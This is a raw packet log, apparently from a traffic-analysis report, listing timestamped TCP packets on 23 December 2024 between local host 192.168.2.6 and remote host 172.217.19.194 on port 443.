                                                                                                                                                                                                                              Dec 23, 2024 10:34:07.361464024 CET44349859172.217.19.194192.168.2.6
                                                                                                                                                                                                                              Dec 23, 2024 10:34:07.361568928 CET49859443192.168.2.6172.217.19.194
                                                                                                                                                                                                                              Dec 23, 2024 10:34:07.367023945 CET44349859172.217.19.194192.168.2.6
                                                                                                                                                                                                                              Dec 23, 2024 10:34:07.367176056 CET49859443192.168.2.6172.217.19.194
                                                                                                                                                                                                                              Dec 23, 2024 10:34:07.374641895 CET44349859172.217.19.194192.168.2.6
                                                                                                                                                                                                                              Dec 23, 2024 10:34:07.374772072 CET49859443192.168.2.6172.217.19.194
                                                                                                                                                                                                                              Dec 23, 2024 10:34:07.378186941 CET44349859172.217.19.194192.168.2.6
                                                                                                                                                                                                                              Dec 23, 2024 10:34:07.378226042 CET49859443192.168.2.6172.217.19.194
                                                                                                                                                                                                                              Dec 23, 2024 10:34:07.388200998 CET44349859172.217.19.194192.168.2.6
                                                                                                                                                                                                                              Dec 23, 2024 10:34:07.388340950 CET49859443192.168.2.6172.217.19.194
                                                                                                                                                                                                                              Dec 23, 2024 10:34:07.391765118 CET44349859172.217.19.194192.168.2.6
                                                                                                                                                                                                                              Dec 23, 2024 10:34:07.391895056 CET49859443192.168.2.6172.217.19.194
                                                                                                                                                                                                                              Dec 23, 2024 10:34:07.402612925 CET44349859172.217.19.194192.168.2.6
                                                                                                                                                                                                                              Dec 23, 2024 10:34:07.402753115 CET49859443192.168.2.6172.217.19.194
                                                                                                                                                                                                                              Dec 23, 2024 10:34:07.402760983 CET44349859172.217.19.194192.168.2.6
                                                                                                                                                                                                                              Dec 23, 2024 10:34:07.402810097 CET49859443192.168.2.6172.217.19.194
                                                                                                                                                                                                                              Dec 23, 2024 10:34:07.415931940 CET44349859172.217.19.194192.168.2.6
                                                                                                                                                                                                                              Dec 23, 2024 10:34:07.416023970 CET49859443192.168.2.6172.217.19.194
                                                                                                                                                                                                                              Dec 23, 2024 10:34:07.416066885 CET44349859172.217.19.194192.168.2.6
                                                                                                                                                                                                                              Dec 23, 2024 10:34:07.416141987 CET49859443192.168.2.6172.217.19.194
                                                                                                                                                                                                                              Dec 23, 2024 10:34:07.428201914 CET44349859172.217.19.194192.168.2.6
                                                                                                                                                                                                                              Dec 23, 2024 10:34:07.428268909 CET49859443192.168.2.6172.217.19.194
                                                                                                                                                                                                                              Dec 23, 2024 10:34:07.428370953 CET44349859172.217.19.194192.168.2.6
                                                                                                                                                                                                                              Dec 23, 2024 10:34:07.428415060 CET49859443192.168.2.6172.217.19.194
                                                                                                                                                                                                                              Dec 23, 2024 10:34:07.440769911 CET44349859172.217.19.194192.168.2.6
                                                                                                                                                                                                                              Dec 23, 2024 10:34:07.440908909 CET49859443192.168.2.6172.217.19.194
                                                                                                                                                                                                                              Dec 23, 2024 10:34:07.440924883 CET44349859172.217.19.194192.168.2.6
                                                                                                                                                                                                                              Dec 23, 2024 10:34:07.441090107 CET49859443192.168.2.6172.217.19.194
                                                                                                                                                                                                                              Dec 23, 2024 10:34:07.453469038 CET44349859172.217.19.194192.168.2.6
                                                                                                                                                                                                                              Dec 23, 2024 10:34:07.453613043 CET49859443192.168.2.6172.217.19.194
                                                                                                                                                                                                                              Dec 23, 2024 10:34:07.453627110 CET44349859172.217.19.194192.168.2.6
                                                                                                                                                                                                                              Dec 23, 2024 10:34:07.453722954 CET49859443192.168.2.6172.217.19.194
                                                                                                                                                                                                                              Dec 23, 2024 10:34:07.466108084 CET44349859172.217.19.194192.168.2.6
                                                                                                                                                                                                                              Dec 23, 2024 10:34:07.466248989 CET49859443192.168.2.6172.217.19.194
                                                                                                                                                                                                                              Dec 23, 2024 10:34:07.466257095 CET44349859172.217.19.194192.168.2.6
                                                                                                                                                                                                                              Dec 23, 2024 10:34:07.466351986 CET49859443192.168.2.6172.217.19.194
                                                                                                                                                                                                                              Dec 23, 2024 10:34:07.478866100 CET44349859172.217.19.194192.168.2.6
                                                                                                                                                                                                                              Dec 23, 2024 10:34:07.478961945 CET49859443192.168.2.6172.217.19.194
                                                                                                                                                                                                                              Dec 23, 2024 10:34:07.478984118 CET44349859172.217.19.194192.168.2.6
                                                                                                                                                                                                                              Dec 23, 2024 10:34:07.479052067 CET49859443192.168.2.6172.217.19.194
                                                                                                                                                                                                                              Dec 23, 2024 10:34:07.538089991 CET44349859172.217.19.194192.168.2.6
                                                                                                                                                                                                                              Dec 23, 2024 10:34:07.538228035 CET49859443192.168.2.6172.217.19.194
                                                                                                                                                                                                                              Dec 23, 2024 10:34:07.538235903 CET44349859172.217.19.194192.168.2.6
                                                                                                                                                                                                                              Dec 23, 2024 10:34:07.538439035 CET49859443192.168.2.6172.217.19.194
                                                                                                                                                                                                                              Dec 23, 2024 10:34:07.540200949 CET44349859172.217.19.194192.168.2.6
                                                                                                                                                                                                                              Dec 23, 2024 10:34:07.540285110 CET49859443192.168.2.6172.217.19.194
                                                                                                                                                                                                                              Dec 23, 2024 10:34:07.540322065 CET44349859172.217.19.194192.168.2.6
                                                                                                                                                                                                                              Dec 23, 2024 10:34:07.540442944 CET49859443192.168.2.6172.217.19.194
                                                                                                                                                                                                                              Dec 23, 2024 10:34:07.544487953 CET44349859172.217.19.194192.168.2.6
                                                                                                                                                                                                                              Dec 23, 2024 10:34:07.544651985 CET49859443192.168.2.6172.217.19.194
                                                                                                                                                                                                                              Dec 23, 2024 10:34:07.544658899 CET44349859172.217.19.194192.168.2.6
                                                                                                                                                                                                                              Dec 23, 2024 10:34:07.544756889 CET49859443192.168.2.6172.217.19.194
                                                                                                                                                                                                                              Dec 23, 2024 10:34:07.550579071 CET44349859172.217.19.194192.168.2.6
                                                                                                                                                                                                                              Dec 23, 2024 10:34:07.550638914 CET49859443192.168.2.6172.217.19.194
                                                                                                                                                                                                                              Dec 23, 2024 10:34:07.550709009 CET44349859172.217.19.194192.168.2.6
                                                                                                                                                                                                                              Dec 23, 2024 10:34:07.550781012 CET49859443192.168.2.6172.217.19.194
                                                                                                                                                                                                                              Dec 23, 2024 10:34:07.556391954 CET44349859172.217.19.194192.168.2.6
                                                                                                                                                                                                                              Dec 23, 2024 10:34:07.556519985 CET49859443192.168.2.6172.217.19.194
                                                                                                                                                                                                                              Dec 23, 2024 10:34:07.556591034 CET44349859172.217.19.194192.168.2.6
                                                                                                                                                                                                                              Dec 23, 2024 10:34:07.556689978 CET49859443192.168.2.6172.217.19.194
                                                                                                                                                                                                                              Dec 23, 2024 10:34:07.567220926 CET44349859172.217.19.194192.168.2.6
                                                                                                                                                                                                                              Dec 23, 2024 10:34:07.567295074 CET44349859172.217.19.194192.168.2.6
                                                                                                                                                                                                                              Dec 23, 2024 10:34:07.567333937 CET49859443192.168.2.6172.217.19.194
                                                                                                                                                                                                                              Dec 23, 2024 10:34:07.567341089 CET44349859172.217.19.194192.168.2.6
                                                                                                                                                                                                                              Dec 23, 2024 10:34:07.567362070 CET49859443192.168.2.6172.217.19.194
                                                                                                                                                                                                                              Dec 23, 2024 10:34:07.567388058 CET49859443192.168.2.6172.217.19.194
                                                                                                                                                                                                                              Dec 23, 2024 10:34:07.578212023 CET44349859172.217.19.194192.168.2.6
                                                                                                                                                                                                                              Dec 23, 2024 10:34:07.578358889 CET49859443192.168.2.6172.217.19.194
                                                                                                                                                                                                                              Dec 23, 2024 10:34:07.578366041 CET44349859172.217.19.194192.168.2.6
                                                                                                                                                                                                                              Dec 23, 2024 10:34:07.578461885 CET49859443192.168.2.6172.217.19.194
                                                                                                                                                                                                                              Dec 23, 2024 10:34:07.588887930 CET44349859172.217.19.194192.168.2.6
                                                                                                                                                                                                                              Dec 23, 2024 10:34:07.589024067 CET49859443192.168.2.6172.217.19.194
                                                                                                                                                                                                                              Dec 23, 2024 10:34:07.589030027 CET44349859172.217.19.194192.168.2.6
                                                                                                                                                                                                                              Dec 23, 2024 10:34:07.589123964 CET49859443192.168.2.6172.217.19.194
                                                                                                                                                                                                                              Dec 23, 2024 10:34:07.599766970 CET44349859172.217.19.194192.168.2.6
                                                                                                                                                                                                                              Dec 23, 2024 10:34:07.599837065 CET49859443192.168.2.6172.217.19.194
                                                                                                                                                                                                                              Dec 23, 2024 10:34:07.599885941 CET44349859172.217.19.194192.168.2.6
                                                                                                                                                                                                                              Dec 23, 2024 10:34:07.600008965 CET49859443192.168.2.6172.217.19.194
                                                                                                                                                                                                                              Dec 23, 2024 10:34:07.610368013 CET44349859172.217.19.194192.168.2.6
                                                                                                                                                                                                                              Dec 23, 2024 10:34:07.611073017 CET49859443192.168.2.6172.217.19.194
                                                                                                                                                                                                                              Dec 23, 2024 10:34:07.611079931 CET44349859172.217.19.194192.168.2.6
                                                                                                                                                                                                                              Dec 23, 2024 10:34:07.611174107 CET49859443192.168.2.6172.217.19.194
                                                                                                                                                                                                                              Dec 23, 2024 10:34:07.621088982 CET44349859172.217.19.194192.168.2.6
                                                                                                                                                                                                                              Dec 23, 2024 10:34:07.621709108 CET49859443192.168.2.6172.217.19.194
                                                                                                                                                                                                                              Dec 23, 2024 10:34:07.621716022 CET44349859172.217.19.194192.168.2.6
                                                                                                                                                                                                                              Dec 23, 2024 10:34:07.621823072 CET49859443192.168.2.6172.217.19.194
                                                                                                                                                                                                                              Dec 23, 2024 10:34:07.631817102 CET44349859172.217.19.194192.168.2.6
                                                                                                                                                                                                                              Dec 23, 2024 10:34:07.631891966 CET49859443192.168.2.6172.217.19.194
                                                                                                                                                                                                                              Dec 23, 2024 10:34:07.631931067 CET44349859172.217.19.194192.168.2.6
                                                                                                                                                                                                                              Dec 23, 2024 10:34:07.632721901 CET49859443192.168.2.6172.217.19.194
                                                                                                                                                                                                                              Dec 23, 2024 10:34:07.641783953 CET44349859172.217.19.194192.168.2.6
                                                                                                                                                                                                                              Dec 23, 2024 10:34:07.641980886 CET49859443192.168.2.6172.217.19.194
                                                                                                                                                                                                                              Dec 23, 2024 10:34:07.641988039 CET44349859172.217.19.194192.168.2.6
                                                                                                                                                                                                                              Dec 23, 2024 10:34:07.642108917 CET49859443192.168.2.6172.217.19.194
                                                                                                                                                                                                                              Dec 23, 2024 10:34:07.651957989 CET44349859172.217.19.194192.168.2.6
                                                                                                                                                                                                                              Dec 23, 2024 10:34:07.652363062 CET49859443192.168.2.6172.217.19.194
                                                                                                                                                                                                                              Dec 23, 2024 10:34:07.652369022 CET44349859172.217.19.194192.168.2.6
                                                                                                                                                                                                                              Dec 23, 2024 10:34:07.652508020 CET49859443192.168.2.6172.217.19.194
                                                                                                                                                                                                                              Dec 23, 2024 10:34:07.661180019 CET44349859172.217.19.194192.168.2.6
                                                                                                                                                                                                                              Dec 23, 2024 10:34:07.661283016 CET49859443192.168.2.6172.217.19.194
                                                                                                                                                                                                                              Dec 23, 2024 10:34:07.661298990 CET44349859172.217.19.194192.168.2.6
                                                                                                                                                                                                                              Dec 23, 2024 10:34:07.661493063 CET49859443192.168.2.6172.217.19.194
                                                                                                                                                                                                                              Dec 23, 2024 10:34:07.670078039 CET44349859172.217.19.194192.168.2.6
                                                                                                                                                                                                                              Dec 23, 2024 10:34:07.670223951 CET49859443192.168.2.6172.217.19.194
                                                                                                                                                                                                                              Dec 23, 2024 10:34:07.670229912 CET44349859172.217.19.194192.168.2.6
                                                                                                                                                                                                                              Dec 23, 2024 10:34:07.670334101 CET49859443192.168.2.6172.217.19.194
                                                                                                                                                                                                                              Dec 23, 2024 10:34:07.679042101 CET44349859172.217.19.194192.168.2.6
                                                                                                                                                                                                                              Dec 23, 2024 10:34:07.679111958 CET49859443192.168.2.6172.217.19.194
                                                                                                                                                                                                                              Dec 23, 2024 10:34:07.679117918 CET44349859172.217.19.194192.168.2.6
                                                                                                                                                                                                                              Dec 23, 2024 10:34:07.679352045 CET49859443192.168.2.6172.217.19.194
                                                                                                                                                                                                                              Dec 23, 2024 10:34:07.687585115 CET44349859172.217.19.194192.168.2.6
                                                                                                                                                                                                                              Dec 23, 2024 10:34:07.687732935 CET49859443192.168.2.6172.217.19.194
                                                                                                                                                                                                                              Dec 23, 2024 10:34:07.687740088 CET44349859172.217.19.194192.168.2.6
                                                                                                                                                                                                                              Dec 23, 2024 10:34:07.687853098 CET49859443192.168.2.6172.217.19.194
                                                                                                                                                                                                                              Dec 23, 2024 10:34:07.696000099 CET44349859172.217.19.194192.168.2.6
                                                                                                                                                                                                                              Dec 23, 2024 10:34:07.696060896 CET49859443192.168.2.6172.217.19.194
                                                                                                                                                                                                                              Dec 23, 2024 10:34:07.696080923 CET44349859172.217.19.194192.168.2.6
                                                                                                                                                                                                                              Dec 23, 2024 10:34:07.696168900 CET49859443192.168.2.6172.217.19.194
                                                                                                                                                                                                                              Dec 23, 2024 10:34:07.703921080 CET44349859172.217.19.194192.168.2.6
                                                                                                                                                                                                                              Dec 23, 2024 10:34:07.704087973 CET49859443192.168.2.6172.217.19.194
                                                                                                                                                                                                                              Dec 23, 2024 10:34:07.704094887 CET44349859172.217.19.194192.168.2.6
                                                                                                                                                                                                                              Dec 23, 2024 10:34:07.704263926 CET49859443192.168.2.6172.217.19.194
                                                                                                                                                                                                                              Dec 23, 2024 10:34:07.711822033 CET44349859172.217.19.194192.168.2.6
                                                                                                                                                                                                                              Dec 23, 2024 10:34:07.712054968 CET49859443192.168.2.6172.217.19.194
                                                                                                                                                                                                                              Dec 23, 2024 10:34:07.712060928 CET44349859172.217.19.194192.168.2.6
                                                                                                                                                                                                                              Dec 23, 2024 10:34:07.712160110 CET49859443192.168.2.6172.217.19.194
                                                                                                                                                                                                                              Dec 23, 2024 10:34:07.719635010 CET44349859172.217.19.194192.168.2.6
                                                                                                                                                                                                                              Dec 23, 2024 10:34:07.719784975 CET49859443192.168.2.6172.217.19.194
                                                                                                                                                                                                                              Dec 23, 2024 10:34:07.719793081 CET44349859172.217.19.194192.168.2.6
                                                                                                                                                                                                                              Dec 23, 2024 10:34:07.719860077 CET49859443192.168.2.6172.217.19.194
                                                                                                                                                                                                                              Dec 23, 2024 10:34:07.730057001 CET44349859172.217.19.194192.168.2.6
                                                                                                                                                                                                                              Dec 23, 2024 10:34:07.730221033 CET49859443192.168.2.6172.217.19.194
                                                                                                                                                                                                                              Dec 23, 2024 10:34:07.730228901 CET44349859172.217.19.194192.168.2.6
                                                                                                                                                                                                                              Dec 23, 2024 10:34:07.730365038 CET49859443192.168.2.6172.217.19.194
                                                                                                                                                                                                                              Dec 23, 2024 10:34:07.735516071 CET44349859172.217.19.194192.168.2.6
                                                                                                                                                                                                                              Dec 23, 2024 10:34:07.735663891 CET49859443192.168.2.6172.217.19.194
                                                                                                                                                                                                                              Dec 23, 2024 10:34:07.735671043 CET44349859172.217.19.194192.168.2.6
                                                                                                                                                                                                                              Dec 23, 2024 10:34:07.735768080 CET49859443192.168.2.6172.217.19.194
                                                                                                                                                                                                                              Dec 23, 2024 10:34:07.740727901 CET44349859172.217.19.194192.168.2.6
                                                                                                                                                                                                                              Dec 23, 2024 10:34:07.740885019 CET49859443192.168.2.6172.217.19.194
                                                                                                                                                                                                                              Dec 23, 2024 10:34:07.740891933 CET44349859172.217.19.194192.168.2.6
                                                                                                                                                                                                                              Dec 23, 2024 10:34:07.741075039 CET49859443192.168.2.6172.217.19.194
                                                                                                                                                                                                                              Dec 23, 2024 10:34:07.745810986 CET44349859172.217.19.194192.168.2.6
                                                                                                                                                                                                                              Dec 23, 2024 10:34:07.745969057 CET49859443192.168.2.6172.217.19.194
                                                                                                                                                                                                                              Dec 23, 2024 10:34:07.745975971 CET44349859172.217.19.194192.168.2.6
                                                                                                                                                                                                                              Dec 23, 2024 10:34:07.746165037 CET49859443192.168.2.6172.217.19.194
                                                                                                                                                                                                                              Dec 23, 2024 10:34:07.750823021 CET44349859172.217.19.194192.168.2.6
                                                                                                                                                                                                                              Dec 23, 2024 10:34:07.750978947 CET49859443192.168.2.6172.217.19.194
                                                                                                                                                                                                                              Dec 23, 2024 10:34:07.750986099 CET44349859172.217.19.194192.168.2.6
                                                                                                                                                                                                                              Dec 23, 2024 10:34:07.751111031 CET49859443192.168.2.6172.217.19.194
                                                                                                                                                                                                                              Dec 23, 2024 10:34:07.755795002 CET44349859172.217.19.194192.168.2.6
                                                                                                                                                                                                                              Dec 23, 2024 10:34:07.755945921 CET49859443192.168.2.6172.217.19.194
                                                                                                                                                                                                                              Dec 23, 2024 10:34:07.755951881 CET44349859172.217.19.194192.168.2.6
                                                                                                                                                                                                                              Dec 23, 2024 10:34:07.756117105 CET49859443192.168.2.6172.217.19.194
                                                                                                                                                                                                                              Dec 23, 2024 10:34:07.760751009 CET44349859172.217.19.194192.168.2.6
                                                                                                                                                                                                                              Dec 23, 2024 10:34:07.760874033 CET49859443192.168.2.6172.217.19.194
                                                                                                                                                                                                                              Dec 23, 2024 10:34:07.760880947 CET44349859172.217.19.194192.168.2.6
                                                                                                                                                                                                                              Dec 23, 2024 10:34:07.761143923 CET49859443192.168.2.6172.217.19.194
                                                                                                                                                                                                                              Dec 23, 2024 10:34:07.762038946 CET44349859172.217.19.194192.168.2.6
                                                                                                                                                                                                                              Dec 23, 2024 10:34:07.762171984 CET49859443192.168.2.6172.217.19.194
                                                                                                                                                                                                                              Dec 23, 2024 10:34:07.765818119 CET44349859172.217.19.194192.168.2.6
                                                                                                                                                                                                                              Dec 23, 2024 10:34:07.766002893 CET49859443192.168.2.6172.217.19.194
                                                                                                                                                                                                                              Dec 23, 2024 10:34:07.767108917 CET44349859172.217.19.194192.168.2.6
                                                                                                                                                                                                                              Dec 23, 2024 10:34:07.767374039 CET49859443192.168.2.6172.217.19.194
                                                                                                                                                                                                                              Dec 23, 2024 10:34:07.770975113 CET44349859172.217.19.194192.168.2.6
                                                                                                                                                                                                                              Dec 23, 2024 10:34:07.771121025 CET49859443192.168.2.6172.217.19.194
                                                                                                                                                                                                                              Dec 23, 2024 10:34:07.772182941 CET44349859172.217.19.194192.168.2.6
                                                                                                                                                                                                                              Dec 23, 2024 10:34:07.772305012 CET49859443192.168.2.6172.217.19.194
                                                                                                                                                                                                                              Dec 23, 2024 10:34:07.775691032 CET44349859172.217.19.194192.168.2.6
                                                                                                                                                                                                                              Dec 23, 2024 10:34:07.775852919 CET49859443192.168.2.6172.217.19.194
                                                                                                                                                                                                                              Dec 23, 2024 10:34:07.777004004 CET44349859172.217.19.194192.168.2.6
                                                                                                                                                                                                                              Dec 23, 2024 10:34:07.777128935 CET49859443192.168.2.6172.217.19.194
                                                                                                                                                                                                                              Dec 23, 2024 10:34:07.780740023 CET44349859172.217.19.194192.168.2.6
                                                                                                                                                                                                                              Dec 23, 2024 10:34:07.780915022 CET49859443192.168.2.6172.217.19.194
                                                                                                                                                                                                                              Dec 23, 2024 10:34:07.782001972 CET44349859172.217.19.194192.168.2.6
                                                                                                                                                                                                                              Dec 23, 2024 10:34:07.782172918 CET49859443192.168.2.6172.217.19.194
                                                                                                                                                                                                                              Dec 23, 2024 10:34:07.785690069 CET44349859172.217.19.194192.168.2.6
                                                                                                                                                                                                                              Dec 23, 2024 10:34:07.785780907 CET49859443192.168.2.6172.217.19.194
                                                                                                                                                                                                                              Dec 23, 2024 10:34:07.786762953 CET44349859172.217.19.194192.168.2.6
                                                                                                                                                                                                                              Dec 23, 2024 10:34:07.786941051 CET49859443192.168.2.6172.217.19.194
                                                                                                                                                                                                                              Dec 23, 2024 10:34:07.790571928 CET44349859172.217.19.194192.168.2.6
                                                                                                                                                                                                                              Dec 23, 2024 10:34:07.790728092 CET49859443192.168.2.6172.217.19.194
                                                                                                                                                                                                                              Dec 23, 2024 10:34:07.791662931 CET44349859172.217.19.194192.168.2.6
                                                                                                                                                                                                                              Dec 23, 2024 10:34:07.791794062 CET49859443192.168.2.6172.217.19.194
                                                                                                                                                                                                                              Dec 23, 2024 10:34:07.795494080 CET44349859172.217.19.194192.168.2.6
                                                                                                                                                                                                                              Dec 23, 2024 10:34:07.795666933 CET49859443192.168.2.6172.217.19.194
                                                                                                                                                                                                                              Dec 23, 2024 10:34:07.796545029 CET44349859172.217.19.194192.168.2.6
                                                                                                                                                                                                                              Dec 23, 2024 10:34:07.796695948 CET49859443192.168.2.6172.217.19.194
                                                                                                                                                                                                                              Dec 23, 2024 10:34:07.800235033 CET44349859172.217.19.194192.168.2.6
                                                                                                                                                                                                                              Dec 23, 2024 10:34:07.800343037 CET49859443192.168.2.6172.217.19.194
                                                                                                                                                                                                                              Dec 23, 2024 10:34:07.800920010 CET44349859172.217.19.194192.168.2.6
                                                                                                                                                                                                                              Dec 23, 2024 10:34:07.801042080 CET49859443192.168.2.6172.217.19.194
                                                                                                                                                                                                                              Dec 23, 2024 10:34:07.805155993 CET44349859172.217.19.194192.168.2.6
                                                                                                                                                                                                                              Dec 23, 2024 10:34:07.805236101 CET49859443192.168.2.6172.217.19.194
                                                                                                                                                                                                                              Dec 23, 2024 10:34:07.806248903 CET44349859172.217.19.194192.168.2.6
                                                                                                                                                                                                                              Dec 23, 2024 10:34:07.806387901 CET49859443192.168.2.6172.217.19.194
                                                                                                                                                                                                                              Dec 23, 2024 10:34:07.810113907 CET44349859172.217.19.194192.168.2.6
                                                                                                                                                                                                                              Dec 23, 2024 10:34:07.810410023 CET49859443192.168.2.6172.217.19.194
                                                                                                                                                                                                                              Dec 23, 2024 10:34:07.811064005 CET44349859172.217.19.194192.168.2.6
                                                                                                                                                                                                                              Dec 23, 2024 10:34:07.811162949 CET49859443192.168.2.6172.217.19.194
                                                                                                                                                                                                                              Dec 23, 2024 10:34:07.814692974 CET44349859172.217.19.194192.168.2.6
                                                                                                                                                                                                                              Dec 23, 2024 10:34:07.814790964 CET49859443192.168.2.6172.217.19.194
                                                                                                                                                                                                                              Dec 23, 2024 10:34:07.815772057 CET44349859172.217.19.194192.168.2.6
                                                                                                                                                                                                                              Dec 23, 2024 10:34:07.815906048 CET49859443192.168.2.6172.217.19.194
                                                                                                                                                                                                                              Dec 23, 2024 10:34:07.819466114 CET44349859172.217.19.194192.168.2.6
                                                                                                                                                                                                                              Dec 23, 2024 10:34:07.819614887 CET49859443192.168.2.6172.217.19.194
                                                                                                                                                                                                                              Dec 23, 2024 10:34:07.819622040 CET44349859172.217.19.194192.168.2.6
                                                                                                                                                                                                                              Dec 23, 2024 10:34:07.819715977 CET49859443192.168.2.6172.217.19.194
                                                                                                                                                                                                                              Dec 23, 2024 10:34:07.824109077 CET44349859172.217.19.194192.168.2.6
                                                                                                                                                                                                                              Dec 23, 2024 10:34:07.824263096 CET49859443192.168.2.6172.217.19.194
                                                                                                                                                                                                                              Dec 23, 2024 10:34:07.824270964 CET44349859172.217.19.194192.168.2.6
                                                                                                                                                                                                                              Dec 23, 2024 10:34:07.824376106 CET49859443192.168.2.6172.217.19.194
                                                                                                                                                                                                                              Dec 23, 2024 10:34:07.829319954 CET44349859172.217.19.194192.168.2.6
                                                                                                                                                                                                                              Dec 23, 2024 10:34:07.829485893 CET49859443192.168.2.6172.217.19.194
                                                                                                                                                                                                                              Dec 23, 2024 10:34:07.829493046 CET44349859172.217.19.194192.168.2.6
                                                                                                                                                                                                                              Dec 23, 2024 10:34:07.829757929 CET49859443192.168.2.6172.217.19.194
                                                                                                                                                                                                                              Dec 23, 2024 10:34:07.833399057 CET44349859172.217.19.194192.168.2.6
                                                                                                                                                                                                                              Dec 23, 2024 10:34:07.833580971 CET49859443192.168.2.6172.217.19.194
                                                                                                                                                                                                                              Dec 23, 2024 10:34:07.833587885 CET44349859172.217.19.194192.168.2.6
                                                                                                                                                                                                                              Dec 23, 2024 10:34:07.833702087 CET49859443192.168.2.6172.217.19.194
                                                                                                                                                                                                                              Dec 23, 2024 10:34:07.838184118 CET44349859172.217.19.194192.168.2.6
                                                                                                                                                                                                                              Dec 23, 2024 10:34:07.838337898 CET49859443192.168.2.6172.217.19.194
                                                                                                                                                                                                                              Dec 23, 2024 10:34:07.838346004 CET44349859172.217.19.194192.168.2.6
                                                                                                                                                                                                                              Dec 23, 2024 10:34:07.838457108 CET49859443192.168.2.6172.217.19.194
                                                                                                                                                                                                                              Dec 23, 2024 10:34:07.842719078 CET44349859172.217.19.194192.168.2.6
                                                                                                                                                                                                                              Dec 23, 2024 10:34:07.842870951 CET49859443192.168.2.6172.217.19.194
                                                                                                                                                                                                                              Dec 23, 2024 10:34:07.842878103 CET44349859172.217.19.194192.168.2.6
                                                                                                                                                                                                                              Dec 23, 2024 10:34:07.842997074 CET49859443192.168.2.6172.217.19.194
                                                                                                                                                                                                                              Dec 23, 2024 10:34:07.847282887 CET44349859172.217.19.194192.168.2.6
                                                                                                                                                                                                                              Dec 23, 2024 10:34:07.847593069 CET49859443192.168.2.6172.217.19.194
                                                                                                                                                                                                                              Dec 23, 2024 10:34:07.847599030 CET44349859172.217.19.194192.168.2.6
                                                                                                                                                                                                                              Dec 23, 2024 10:34:07.847901106 CET49859443192.168.2.6172.217.19.194
                                                                                                                                                                                                                              Dec 23, 2024 10:34:07.851834059 CET44349859172.217.19.194192.168.2.6
                                                                                                                                                                                                                              Dec 23, 2024 10:34:07.851979017 CET49859443192.168.2.6172.217.19.194
                                                                                                                                                                                                                              Dec 23, 2024 10:34:07.851984024 CET44349859172.217.19.194192.168.2.6
                                                                                                                                                                                                                              Dec 23, 2024 10:34:07.852160931 CET49859443192.168.2.6172.217.19.194
                                                                                                                                                                                                                              Dec 23, 2024 10:34:07.856457949 CET44349859172.217.19.194192.168.2.6
                                                                                                                                                                                                                              Dec 23, 2024 10:34:07.856551886 CET49859443192.168.2.6172.217.19.194
                                                                                                                                                                                                                              Dec 23, 2024 10:34:07.856559038 CET44349859172.217.19.194192.168.2.6
                                                                                                                                                                                                                              Dec 23, 2024 10:34:07.857106924 CET49859443192.168.2.6172.217.19.194
                                                                                                                                                                                                                              Dec 23, 2024 10:34:07.860873938 CET44349859172.217.19.194192.168.2.6
                                                                                                                                                                                                                              Dec 23, 2024 10:34:07.860999107 CET49859443192.168.2.6172.217.19.194
                                                                                                                                                                                                                              Dec 23, 2024 10:34:07.861006021 CET44349859172.217.19.194192.168.2.6
                                                                                                                                                                                                                              Dec 23, 2024 10:34:07.861073017 CET49859443192.168.2.6172.217.19.194
                                                                                                                                                                                                                              Dec 23, 2024 10:34:07.865266085 CET44349859172.217.19.194192.168.2.6
                                                                                                                                                                                                                              Dec 23, 2024 10:34:07.865401030 CET49859443192.168.2.6172.217.19.194
                                                                                                                                                                                                                              Dec 23, 2024 10:34:07.865406990 CET44349859172.217.19.194192.168.2.6
                                                                                                                                                                                                                              Dec 23, 2024 10:34:07.865473986 CET49859443192.168.2.6172.217.19.194
                                                                                                                                                                                                                              Dec 23, 2024 10:34:07.869719028 CET44349859172.217.19.194192.168.2.6
                                                                                                                                                                                                                              Dec 23, 2024 10:34:07.869834900 CET49859443192.168.2.6172.217.19.194
                                                                                                                                                                                                                              Dec 23, 2024 10:34:07.869842052 CET44349859172.217.19.194192.168.2.6
                                                                                                                                                                                                                              Dec 23, 2024 10:34:07.869956017 CET49859443192.168.2.6172.217.19.194
                                                                                                                                                                                                                              Dec 23, 2024 10:34:07.874090910 CET44349859172.217.19.194192.168.2.6
                                                                                                                                                                                                                              Dec 23, 2024 10:34:07.874145985 CET49859443192.168.2.6172.217.19.194
                                                                                                                                                                                                                              Dec 23, 2024 10:34:07.874205112 CET44349859172.217.19.194192.168.2.6
                                                                                                                                                                                                                              Dec 23, 2024 10:34:07.874366045 CET49859443192.168.2.6172.217.19.194
                                                                                                                                                                                                                              Dec 23, 2024 10:34:07.878462076 CET44349859172.217.19.194192.168.2.6
                                                                                                                                                                                                                              Dec 23, 2024 10:34:07.878586054 CET49859443192.168.2.6172.217.19.194
                                                                                                                                                                                                                              Dec 23, 2024 10:34:07.878593922 CET44349859172.217.19.194192.168.2.6
                                                                                                                                                                                                                              Dec 23, 2024 10:34:07.878758907 CET49859443192.168.2.6172.217.19.194
                                                                                                                                                                                                                              Dec 23, 2024 10:34:07.882803917 CET44349859172.217.19.194192.168.2.6
                                                                                                                                                                                                                              Dec 23, 2024 10:34:07.882966042 CET49859443192.168.2.6172.217.19.194
                                                                                                                                                                                                                              Dec 23, 2024 10:34:07.882972002 CET44349859172.217.19.194192.168.2.6
                                                                                                                                                                                                                              Dec 23, 2024 10:34:07.883088112 CET49859443192.168.2.6172.217.19.194
                                                                                                                                                                                                                              Dec 23, 2024 10:34:07.887108088 CET44349859172.217.19.194192.168.2.6
                                                                                                                                                                                                                              Dec 23, 2024 10:34:07.887216091 CET49859443192.168.2.6172.217.19.194
                                                                                                                                                                                                                              Dec 23, 2024 10:34:07.887223005 CET44349859172.217.19.194192.168.2.6
                                                                                                                                                                                                                              Dec 23, 2024 10:34:07.887276888 CET49859443192.168.2.6172.217.19.194
                                                                                                                                                                                                                              Dec 23, 2024 10:34:07.891319990 CET44349859172.217.19.194192.168.2.6
                                                                                                                                                                                                                              Dec 23, 2024 10:34:07.891453028 CET49859443192.168.2.6172.217.19.194
                                                                                                                                                                                                                              Dec 23, 2024 10:34:07.891458988 CET44349859172.217.19.194192.168.2.6
                                                                                                                                                                                                                              Dec 23, 2024 10:34:07.891562939 CET49859443192.168.2.6172.217.19.194
                                                                                                                                                                                                                              Dec 23, 2024 10:34:07.895463943 CET44349859172.217.19.194192.168.2.6
                                                                                                                                                                                                                              Dec 23, 2024 10:34:07.895613909 CET49859443192.168.2.6172.217.19.194
                                                                                                                                                                                                                              Dec 23, 2024 10:34:07.895621061 CET44349859172.217.19.194192.168.2.6
                                                                                                                                                                                                                              Dec 23, 2024 10:34:07.895729065 CET49859443192.168.2.6172.217.19.194
                                                                                                                                                                                                                              Dec 23, 2024 10:34:07.899642944 CET44349859172.217.19.194192.168.2.6
